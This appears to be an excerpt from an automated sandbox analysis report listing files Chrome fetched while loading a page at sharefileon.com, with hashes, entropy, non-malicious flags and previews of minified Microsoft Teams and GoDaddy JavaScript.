                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                          Size (bytes):38404
                                                                                                                                                                                                                          Entropy (8bit):5.5690674366833575
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:768:c/bUOtal8h8PgUcAwfgnpEdYktAO4sSmySpSmYksKeP6DnCkB/cPZbHfK+pgihEx:c/bUO6IKgUcAwfgnpEdYktAO4sS5SpSG
                                                                                                                                                                                                                          MD5:2F55399E52886902A2567F67B9C6E3EC
                                                                                                                                                                                                                          SHA1:6A35639EB8539794496AB751E66ACA9998584D6F
                                                                                                                                                                                                                          SHA-256:E500FA3FEA2B46454BA6D21704C5F71712D84481EAB8564030B9168BAEDEC858
                                                                                                                                                                                                                          SHA-512:E39EE1FAC79320A50F8F14D3B8D23086B710D5A84924DA0B48B3079328F8C146222649F812F591D12C4F73E40D69B06B6C739A9102673A76070C83A490B2DDA0
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          URL:https://sharefileon.com/markup/ad
                                                                                                                                                                                                                          Preview:<!DOCTYPE html><html lang="en-US"><head><link rel="icon" href="//img1.wsimg.com/isteam/ip/f987ee28-0d2d-4d49-bb11-834c1995f8b3/favicon/909c1b4d-c97b-4914-b7e0-f39ba802c054/b773b1db-e964-4dd6-8fed-45fbfd73ffc5.png/:/rs=w:16,h:16,m" sizes="16x16"/><link rel="icon" href="//img1.wsimg.com/isteam/ip/f987ee28-0d2d-4d49-bb11-834c1995f8b3/favicon/909c1b4d-c97b-4914-b7e0-f39ba802c054/b773b1db-e964-4dd6-8fed-45fbfd73ffc5.png/:/rs=w:24,h:24,m" sizes="24x24"/><link rel="icon" href="//img1.wsimg.com/isteam/ip/f987ee28-0d2d-4d49-bb11-834c1995f8b3/favicon/909c1b4d-c97b-4914-b7e0-f39ba802c054/b773b1db-e964-4dd6-8fed-45fbfd73ffc5.png/:/rs=w:32,h:32,m" sizes="32x32"/><link rel="icon" href="//img1.wsimg.com/isteam/ip/f987ee28-0d2d-4d49-bb11-834c1995f8b3/favicon/909c1b4d-c97b-4914-b7e0-f39ba802c054/b773b1db-e964-4dd6-8fed-45fbfd73ffc5.png/:/rs=w:48,h:48,m" sizes="48x48"/><link rel="icon" href="//img1.wsimg.com/isteam/ip/f987ee28-0d2d-4d49-bb11-834c1995f8b3/favicon/909c1b4d-c97b-4914-b7e0-f39ba802c054/b773
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (14632)
                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                          Size (bytes):14740
                                                                                                                                                                                                                          Entropy (8bit):5.4039958808547786
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:192:7yxZGphPpPVHt9xq+JrcVQ2H+dh6R02te8zXP26T8t2cO8T5m0fN6mdD57h+OR0R:7yxZGnP3t9xqCr+Q76RRN/2Zt2c7gmsr
                                                                                                                                                                                                                          MD5:4020AC6F830FB33A2B29E89DB059B4C0
                                                                                                                                                                                                                          SHA1:2AE741E32C09DD84BCBA604C82393B3362C6E32C
                                                                                                                                                                                                                          SHA-256:F4847442D93F5B9D87C8D54F46E957A0E59AEC8A0E88181767E8894A96BC6F2B
                                                                                                                                                                                                                          SHA-512:36903165D20453C280C7E51667818806F8EF7A8CD326148CD8B1F8F1DDC79A802CC0B66FE9553015AA2E606D5E09017DA5367161D9D182548C70A6E84DCF4F16
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/574626-81646a4463eeafd6.js
                                                                                                                                                                                                                          Preview:(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[574626],{690784:(t,r,e)=>{var o=e(212218)(e(587809),"DataView");t.exports=o},180345:(t,r,e)=>{var o=e(807732),n=e(968386),a=e(2909),s=e(458865),i=e(87225);function c(t){var r=-1,e=null==t?0:t.length;for(this.clear();++r<e;){var o=t[r];this.set(o[0],o[1])}}c.prototype.clear=o,c.prototype.delete=n,c.prototype.get=a,c.prototype.has=s,c.prototype.set=i,t.exports=c},796779:(t,r,e)=>{var o=e(189546),n=e(398316),a=e(902719),s=e(631683),i=e(577051);function c(t){var r=-1,e=null==t?0:t.length;for(this.clear();++r<e;){var o=t[r];this.set(o[0],o[1])}}c.prototype.clear=o,c.prototype.delete=n,c.prototype.get=a,c.prototype.has=s,c.prototype.set=i,t.exports=c},342587:(t,r,e)=>{var o=e(212218)(e(587809),"Map");t.exports=o},525801:(t,r,e)=>{var o=e(678436),n=e(603154),a=e(687181),s=e(328929),i=e(247241);function c(t){var r=-1,e=null==t?0:t.length;for(this.clear();++r<e;){var o=t[r];this.set(o[0],o[1])}}c.
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):80505
                                                                                                                                                                                                                          Entropy (8bit):5.32756788001846
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:1536:fZm8gESV9A9XGgvSrL43eCn6964I2HUg7/uazqw:fZm8gUeSP4I2HF7/uaz1
                                                                                                                                                                                                                          MD5:2CF6036057B0237873DF9AFC9B5E6443
                                                                                                                                                                                                                          SHA1:5AC5019FC2D50997E5351A84877A77473E8D4E28
                                                                                                                                                                                                                          SHA-256:68E3B52CEF21F45A5EF5F6734D292F8F1E26CF7199072DAA055900D2F56D03A8
                                                                                                                                                                                                                          SHA-512:565CF6A371D3F51A542A1A58583E9A4D9F38B7E528777A08F2ED28ACDBE3141D76C28BF931E6F416C53322C7B63A811382BFD12A541D009D013B1858A4010FA9
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          Preview:(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[502994],{863344:(t,e,n)=>{"use strict";n.d(e,{N:()=>s,ZP:()=>u,KB:()=>a});var r=n(795800),i={},o={};function a(t,e){var n=c(t,e);return i[n]}function s(t,e,r,a){var s=c(e,a),u=i[s];if(u&&!r)return Promise.resolve(u);var l=o[s];if(l&&!r)return l;if(!t)return Promise.reject("Missing bootstrapper config");var d=n.e(336689).then(n.bind(n,538774)).then((function(e){return e.initialize(t).then((function(t){return i[s]=t,t}))}));return o[s]=d,d}function u(t,e){var n=c(t,e);delete i[n],delete o[n]}function c(t,e){var n;return[(0,r.Et)(t),null===(n=null==e?void 0:e.getCacheKeySuffix)||void 0===n?void 0:n.call(e)].join("_")}},795800:(t,e,n)=>{"use strict";function r(t,e){var n=e||{};return[t,n.userAadObjectId,n.tenantAadObjectId].join("-")}function i(t){return r("Cortex.TopicsCapabilities",t)}function o(t){return r("Cortex.TopicsSdks",t)}n.d(e,{et:()=>r,MP:()=>i,Et:()=>o})},897604:(t,e,n)=>{"use st
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:Unicode text, UTF-8 text, with very long lines (17293)
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):17439
                                                                                                                                                                                                                          Entropy (8bit):4.674826440745112
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:384:nwZwQX75Bb3yaqArKvqY7hH0jO6Rt/plXnFA:nuX75Bb3yaqArQ/7OThE
                                                                                                                                                                                                                          MD5:32500496CD7503B6D650FF336EA3A383
                                                                                                                                                                                                                          SHA1:84D86AA0BE87503F1804D774C711BC35DBE90480
                                                                                                                                                                                                                          SHA-256:B490DDFA1BE69AEB2E879639151ED665646C2F421D5804160E29F17DE4ACC468
                                                                                                                                                                                                                          SHA-512:D2E40CF661255EACE6B16BD7A8F02A9B28A6F42958B6771F07661DE318200149EAC1BF62F65BA95153013F19B6EF0630D5A9B4382749F04379BA013FF7284513
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[62600],{629050:(e,t,o)=>{o.r(t),o.d(t,{default:()=>i});const i={namespace:"meetingCollaboration",locale:"en-us",translations:{ai_disclosure_text:"AI-generated content may be incorrect",ai_generated_notes:"AI-generated notes",ai_generated_notes_copilot_only_mode:"AI-generated notes aren't available in this meeting",ai_generated_notes_description:"AI takes notes for everyone during the meeting. Transcription also starts.",ai_generated_notes_stopped_banner_description:"AI-generated notes have stopped because transcription or recording was turned off.",ai_generated_notes_title:"AI-generated notes",ai_generated_notes_unlicensed_turn_off_description:"If you turn this off, you won't be able to turn it back on.",ai_generated_notes_unlicensed_turn_on_description:"You don't have permissions to turn this on.",ai_generated_text_in_copy_to_clipboard:"AI-generated content. Be sure to check
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:Unicode text, UTF-8 text, with very long lines (26514)
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):26624
                                                                                                                                                                                                                          Entropy (8bit):5.47874386472264
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:768:yxu3KtjQqUJDUvNt0qHSoDLRMg6xCY5LBzsuKtggY5d0gIOK1WBnzYEnSQuGwZhM:rqJvsq7R6xCY5LBzsuKtuvQWBnhwYRF
                                                                                                                                                                                                                          MD5:CF497941CAB70F3F1C5113B26C528899
                                                                                                                                                                                                                          SHA1:6B86C6AB1C20A3F8336FBA6E98CDACE4BA1D3CF6
                                                                                                                                                                                                                          SHA-256:5655B735D51892C8895F29B2D3F75B7AC8627DF7A3BEC315AE28CEB2466D51EC
                                                                                                                                                                                                                          SHA-512:D79042A462505539252C34DE44BDA0212E1080F17449DD21ABF0A9F4C50386F6ABBF4B8E55CF2115ED5655779549145E38907A8900904E901DE8891ACF18C98B
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[400532],{170962:(e,t,n)=>{n.d(t,{d:()=>i,t:()=>u});var r=n(81984);const i={publicCommercialCloud:"teams.microsoft.com",gccHighCloud:"gov.teams.microsoft.us",dodCloud:"dod.teams.microsoft.us",dev:"local.teams.office.com",devLive:"local.teams.live.com",liveCloud:"teams.live.com",ag08Cloud:"https://teams.eaglex.ic.gov",ag09Cloud:"https://teams.microsoft.scloud"},o=/^(\s|\/)+|(\s|\/)+$/g,a={pathNamesLength:4,threadIDIndex:2,secondPathName:"meetup-join"},s={pathNamesLength:2,meetingIDIndex:1,firstPathName:"meet"};function l(e,t){return[i.dev,i.publicCommercialCloud].includes(t)?[i.devLive,i.liveCloud].includes(e):!![i.devLive,i.liveCloud].includes(t)&&[i.dev,i.publicCommercialCloud].includes(e)}function c(e){let t;try{t=new URL(e)}catch(e){return!1}const n=t.pathname.replace(o,"").split("/");return n.length===a.pathNamesLength&&n[1]===a.secondPathName&&!!n[a.threadIDIndex]||n.leng
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:Unicode text, UTF-8 text, with very long lines (65520), with no line terminators
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):925217
                                                                                                                                                                                                                          Entropy (8bit):4.809605448502386
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:24576:BqNYbMWak+KyPAKHRlqrf+wSKecnXAysI+i:oNfPP7qrf+wSKekAyp+i
                                                                                                                                                                                                                          MD5:06DCD866E3D5E1BDB5D909DD66A35EFA
                                                                                                                                                                                                                          SHA1:2F10EAA3209833AB5282B72F6FCD0179F167F99A
                                                                                                                                                                                                                          SHA-256:A4764454921C61F33141EC5A149B7FFB9EAA9F13F3BE64C79C3FD0F438170235
                                                                                                                                                                                                                          SHA-512:B20FDE9375483F567C9B91A1F91730A8360135E98247DD42B3392CD7FEE539D206EB060B61BA6EFF737A50849D0932180A9699237C12196D6641134CCCB8B311
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[531106],{592150:(e,t,a)=>{a.r(t),a.d(t,{default:()=>o});const o={namespace:"activity",locale:"en-us",translations:{activity_app_name:"Activity",activity_contextual_settings_undo_button:"Undo",activity_esp_chat_recommendation_description:"Start a chat with a coworker or bring everyone together in a group chat",activity_esp_chat_recommendation_title:"Stay in touch using chat",activity_esp_contact_sync_confirmation_description:"Talk to anyone from your contact list.",activity_esp_contact_sync_confirmation_title:"Google contacts synced",activity_esp_files_recommendation_description:"Share all types of files like PDFs, documents or photos",activity_esp_files_recommendation_title:"Share and collaborate on files in chat",activity_esp_meeting_recommendation_description:"Try out meeting backgrounds, reactions, and more",activity_esp_meeting_recommendation_title:"Meet now or later",act
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                          Size (bytes):117250
                                                                                                                                                                                                                          Entropy (8bit):5.162816607799181
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:1536:VJnpRP9EvMVNqpO+sq1YuCFiittzZSLF6c4maUNOwFG7KEEMbg4lxzRSYlwqo3nz:VJpljKsc4mabKEngkoojxgtxtGNL9i
                                                                                                                                                                                                                          MD5:B3031C4F76717B55FAC2255321C6DFA0
                                                                                                                                                                                                                          SHA1:1DFAC14C343D0FF7993C6A350F08EB23336D4A98
                                                                                                                                                                                                                          SHA-256:9450D8177F5466EB1DA5B163BC61851902E688B46D31C02723DD0AB5796770E6
                                                                                                                                                                                                                          SHA-512:26D84072A6825C4E7F4F2F607D8A9AB1057B6D778D801B59F24A7635DC525F0D3D0F672CE641F9D9C9CCD4DBB644E4AB62810D04399DF100774730356D0B2EE8
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/367927-44fa44710376bb7a.js
                                                                                                                                                                                                                          Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[367927],{367927:(e,t,s)=>{s.d(t,{LF:()=>I,gm:()=>q,K9:()=>F,iA:()=>w,uH:()=>T,VB:()=>j,CP:()=>y,nQ:()=>L,Kh:()=>M,bN:()=>C,h7:()=>n,R5:()=>o,rg:()=>k,GD:()=>N,Jm:()=>E,_A:()=>cs,hC:()=>gs,pf:()=>bs,$x:()=>_s,E0:()=>xe,$d:()=>us,Az:()=>ms,S:()=>ds,TP:()=>fs,be:()=>hs,mz:()=>vs,U6:()=>Pe,xR:()=>Es,yH:()=>Se});var i=s(838369);const n="data-tabster",o="data-tabster-dummy",r=["a[href]","button:not([disabled])","input:not([disabled])","select:not([disabled])","textarea:not([disabled])","*[tabindex]","*[contenteditable]","details > summary","audio[controls]","video[controls]"].join(", "),a=1,l=2,c=3,u=0,d=1,h=2,_=0,m=1,f=2,b=3,v=4,g=0,p=1,E={Invisible:0,PartiallyVisible:1,Visible:2},y={Source:0,Target:1},w={Both:0,Vertical:1,Horizontal:2,Grid:3,GridLinear:4},T={ArrowUp:1,ArrowDown:2,ArrowLeft:3,ArrowRight:4,PageUp:5,PageDown:6,Home:7,End:8},F={Unlimited:0,Limited:1,LimitedTrapFocus:
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (63777)
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):63890
                                                                                                                                                                                                                          Entropy (8bit):5.24924468686098
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:1536:fuKMpSt3kjUBjJROogL3SuhQO8GK+f5/cNbmZhkJv15cT1mG0o79xo4j37CtExRD:moOqSf1UMJOOWcKor
                                                                                                                                                                                                                          MD5:E24BED9C55DC2224DE92F9290DB6898E
                                                                                                                                                                                                                          SHA1:9EE122E99868758D26D399C1F9D9D3CBACEF6C8A
                                                                                                                                                                                                                          SHA-256:7FD2B3C64384FF55E2CE806A5810A9FA11F9C562D001233B9AE77A1206B11692
                                                                                                                                                                                                                          SHA-512:E47BE8F0D4EF05E4460EC40017E35165D43D69A9DE4CF42298ECF2466BBF97988E578AD52A1BE0EF7BAD9C9006227A83452FFC29B6EE990220656376CBA861CC
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[838201],{80134:(e,t,n)=>{n.r(t),n.d(t,{GlobalAuthService:()=>be});var i=n(161024),a=n(417694),r=n(775251),s=n(935008),o=n(406138),c=n(802756),u=n(848020),d=n(332752),l=n(510139),h=n(211713),g=n(847431),_=n(366603),T=n(193021),A=n(553882),p=n(407404),v=n(955262),m=n(923226),S=n(191914),b=n(724801),f=n(34655),w=n(348532),I=n(565439),k=n(901456),y=n(188468),U=n(879462),R=n(319095),C=n(103757),E=n(355515),D=n(734025),M=n(805809),N=n(900301);const W=(e,t,n,i,a,r,s,o,c)=>{let u=n?{"content-type":"application/json","x-ms-client-capabilities":"x-ms-mto-enabled"}:{"content-type":"application/json"};const d={"X-TS-UseCache":"false"};o&&(u={...u,...c?d:{}});const l={url:`${i}?invalidate=${+new Date(Date.now())}`,method:a,headers:u,apiName:r,authOptions:{accountId:e,source:"tenants-service-endpoints"},correlationId:t};return s&&(l.body=s),l},$=e=>{const{authenticationResources:t,discover
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                          Size (bytes):80505
                                                                                                                                                                                                                          Entropy (8bit):5.32756788001846
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:1536:fZm8gESV9A9XGgvSrL43eCn6964I2HUg7/uazqw:fZm8gUeSP4I2HF7/uaz1
                                                                                                                                                                                                                          MD5:2CF6036057B0237873DF9AFC9B5E6443
                                                                                                                                                                                                                          SHA1:5AC5019FC2D50997E5351A84877A77473E8D4E28
                                                                                                                                                                                                                          SHA-256:68E3B52CEF21F45A5EF5F6734D292F8F1E26CF7199072DAA055900D2F56D03A8
                                                                                                                                                                                                                          SHA-512:565CF6A371D3F51A542A1A58583E9A4D9F38B7E528777A08F2ED28ACDBE3141D76C28BF931E6F416C53322C7B63A811382BFD12A541D009D013B1858A4010FA9
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/502994-560a49b271bc8e93.js
                                                                                                                                                                                                                          Preview:(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[502994],{863344:(t,e,n)=>{"use strict";n.d(e,{N:()=>s,ZP:()=>u,KB:()=>a});var r=n(795800),i={},o={};function a(t,e){var n=c(t,e);return i[n]}function s(t,e,r,a){var s=c(e,a),u=i[s];if(u&&!r)return Promise.resolve(u);var l=o[s];if(l&&!r)return l;if(!t)return Promise.reject("Missing bootstrapper config");var d=n.e(336689).then(n.bind(n,538774)).then((function(e){return e.initialize(t).then((function(t){return i[s]=t,t}))}));return o[s]=d,d}function u(t,e){var n=c(t,e);delete i[n],delete o[n]}function c(t,e){var n;return[(0,r.Et)(t),null===(n=null==e?void 0:e.getCacheKeySuffix)||void 0===n?void 0:n.call(e)].join("_")}},795800:(t,e,n)=>{"use strict";function r(t,e){var n=e||{};return[t,n.userAadObjectId,n.tenantAadObjectId].join("-")}function i(t){return r("Cortex.TopicsCapabilities",t)}function o(t){return r("Cortex.TopicsSdks",t)}n.d(e,{et:()=>r,MP:()=>i,Et:()=>o})},897604:(t,e,n)=>{"use st
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (29023)
                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                          Size (bytes):29128
                                                                                                                                                                                                                          Entropy (8bit):5.5730044734015305
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:768:5zpVptEWy8YJj4YXorTOBTdwTcbmtd2MysGVqmWyaX/1l:5zpVvyF4/OBTj2LymysT
                                                                                                                                                                                                                          MD5:7E044AB4B512045FB41758E79FF154C8
                                                                                                                                                                                                                          SHA1:4D1E0B07E606608460B6CA2141A772431A1CAD87
                                                                                                                                                                                                                          SHA-256:1AF56B2FBB95A6DFFC43CC598F7D0CD39CAEEC7D9C172936867568743799B951
                                                                                                                                                                                                                          SHA-512:28BBB85FE605C332469AECEBECC880C6D13C579B6297457271E0890789572D2C2A699B69BEB6E82CE090486669E94FC8837F8B354DA0C7E329F20FE70F821F35
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/693-bce9adbf9f09ae94.js
                                                                                                                                                                                                                          Preview:(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[693],{805809:(e,t,n)=>{"use strict";var i,a;n.d(t,{p:()=>i,f:()=>a}),function(e){e.ActiveDirectoryGroupService="ActiveDirectoryGroupService",e.AiInsightsFeedbackService="AiInsightsFeedbackService",e.AppService="appservice",e.AppStudio="appstudio",e.AMS="asyncMediaService",e.AtpSafelinksService="atpSafelinksService",e.Attendee="attendee",e.AllFiles="allFiles",e.Auth="auth",e.Badger="badger",e.BRB="brb",e.CDN="cdn",e.CallingConversationService="callingConversationService",e.ChannelNotificationSettings="channelNotificationSettings",e.CognitiveService="cognitiveService",e.ChatService="chatservice",e.CMDArtifactsService="cmdArtifactsService",e.CmdMeetingIntelligenceService="cmdMeetingIntelligenceService",e.CMDServices="cmdServices",e.CNS="cns",e.CollabCloudService="collabCloudService",e.CSA="csa",e.CustomEmoji="customEmoji",e.CXCS="cxcs",e.DynamicsMarketing="dynamicsMarketing",e.DynamicsVirtua
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (522)
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):586
                                                                                                                                                                                                                          Entropy (8bit):5.2378887904744955
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:12:H/QL7ANBSyTUXaPXAbDTc/NeL2QiTj+RVngQ2ofXgYhMYTHr+pWgL7AO:cANBLTUXaPXAPTc/tTj+HngQ2CQY/HrQ
                                                                                                                                                                                                                          MD5:FADB3719FFA2A9E96CDC64FFEA0220FA
                                                                                                                                                                                                                          SHA1:B9B00833E59E99ECE036B518D8429AF5EFEC1163
                                                                                                                                                                                                                          SHA-256:E8A5463FF98210D3017DEEE55D5A287AD01AAA11DBE7DEB7D07F7D15D7F609F2
                                                                                                                                                                                                                          SHA-512:C6E3581F7676B3204BC0FC8D4DCCF5A383FDE6F17A27D2F855EBEE3D205459BD9866A219808EAB1D4D4B37676D13B516AF546C7125C3FFA22CA74B995A180644
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          Preview:define("@wsb/guac-widget-shared/c/_rollupPluginBabelHelpers-8ce54c82.js",["exports"],(function(e){"use strict";function n(){return n=Object.assign?Object.assign.bind():function(e){for(var n=1;n<arguments.length;n++){var r=arguments[n];for(var t in r)Object.prototype.hasOwnProperty.call(r,t)&&(e[t]=r[t])}return e},n.apply(this,arguments)}e._=n,e.a=function(e,n,r){return n in e?Object.defineProperty(e,n,{value:r,enumerable:!0,configurable:!0,writable:!0}):e[n]=r,e}})),"undefined"!=typeof window&&(window.global=window);.//# sourceMappingURL=_rollupPluginBabelHelpers-8ce54c82.js.map.
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:Unicode text, UTF-8 text, with very long lines (41594)
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):41712
                                                                                                                                                                                                                          Entropy (8bit):5.29491411540647
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:768:4kqwbq1jw+8Thjo4i+I3h2Zixcer63Ns5qJKOw:4RwbqFuTCjIer69Jdw
                                                                                                                                                                                                                          MD5:F9D05C5CD421E615E84AA0595ACAA352
                                                                                                                                                                                                                          SHA1:DD1975343D52A1565C4BAFEF306729040FEA1C9B
                                                                                                                                                                                                                          SHA-256:B75C9801EC0811E358FFC023B1644C416F99808033F551F71E5E948FF785A5B1
                                                                                                                                                                                                                          SHA-512:AFD2EE8C0C3C5A7E688ACAA757881DD1F7912E63E6C95EA013CDE33F22956CD09B8811FD3432472ACA1C370BCB69B83420C651A040492E73157A3B69375A7BA4
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[412417],{975021:(e,t,n)=>{n.d(t,{$3:()=>s,or:()=>c,I6:()=>f,Xx:()=>d,Ui:()=>p,gk:()=>h,iJ:()=>v,T9:()=>m,d1:()=>y,mv:()=>g,cy:()=>b});var r=n(850734),i=n(813801),o=n(613995),a=n(401385),u=n(597309),s=Object.prototype.hasOwnProperty;function c(e,t){var n=e.__typename,r=e.id,i=e._id;if("string"==typeof n&&(t&&(t.keyObject=void 0!==r?{id:r}:void 0!==i?{_id:i}:void 0),void 0===r&&(r=i),void 0!==r))return"".concat(n,":").concat("number"==typeof r||"string"==typeof r?r:JSON.stringify(r))}var l={dataIdFromObject:c,addTypename:!0,resultCaching:!0,canonizeResults:!1};function f(e){return(0,r.o)(l,e)}function d(e){var t=e.canonizeResults;return void 0===t?l.canonizeResults:t}function p(e,t){return(0,i.A_)(t)?e.get(t.__ref,"__typename"):t&&t.__typename}var h=/^[_a-z][_0-9a-z]*/i;function v(e){var t=e.match(h);return t?t[0]:e}function m(e,t,n){return!!(0,o.U)(t)&&(b(t)?t.every((function(
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (879)
                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                          Size (bytes):1001
                                                                                                                                                                                                                          Entropy (8bit):5.101417090131756
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:24:wp3sp38fCaDiRFdhaKWv5iz77RfzSj3TXicEAzELRhc8N:wp3sp3ACzd3WvcxrkbzELN
                                                                                                                                                                                                                          MD5:FD46D921680CA184F472CA46E52795D2
                                                                                                                                                                                                                          SHA1:30A8E5422FDA4A8E8A271ACF1472B942A9DCDC94
                                                                                                                                                                                                                          SHA-256:AA3914B5961F002F6AEF22894193EDBBF0B0CD36F97530F2D4559084AF66C374
                                                                                                                                                                                                                          SHA-512:CFD1469F02B981FFC5BECC85717151C9E8258FA4EE1C05E521817BA2DD2995B052F3B1978208C2CB07BD2132CAC374D1AFB29449C36CC4A5BEC0DF723548512A
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/gallery-locale-en-us-83a3d27de297752a.js
                                                                                                                                                                                                                          Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[227307],{467681:(e,a,l)=>{l.r(a),l.d(a,{default:()=>t});const t={namespace:"gallery",locale:"en-us",translations:{gallery_galleryEmptyStateMessage:"Photos added to chat automatically show up here.",gallery_galleryEmptyStateMessageCommunities:"Photos added to community automatically show up here.",gallery_galleryLoadingMessage:"Loading Photos...",gallery_gallery_grid_images:"Images from",gallery_gallery_grid_label:"Image gallery",gallery_imageGroupLastMonth:"Last Month",gallery_imageGroupMonth:"Earlier This Month",gallery_imageGroupToday:"Today",gallery_imageGroupWeek:"Earlier This Week",gallery_imageGroupYesterday:"Yesterday",gallery_imageLabel:"Image",gallery_image_menu_viewInChat:"View in Chat",gallery_image_menu_viewInCommunity:"View in Community"}}}}]);.//# sourceMappingURL=https://local.teams.office.com/sourcemaps/hashed-assets/gallery-locale-en-us-83a3d27de297752a.js.ma
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (21232)
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):21340
                                                                                                                                                                                                                          Entropy (8bit):5.7585955980452805
                                                                                                                                                                                                                          Encrypted:false
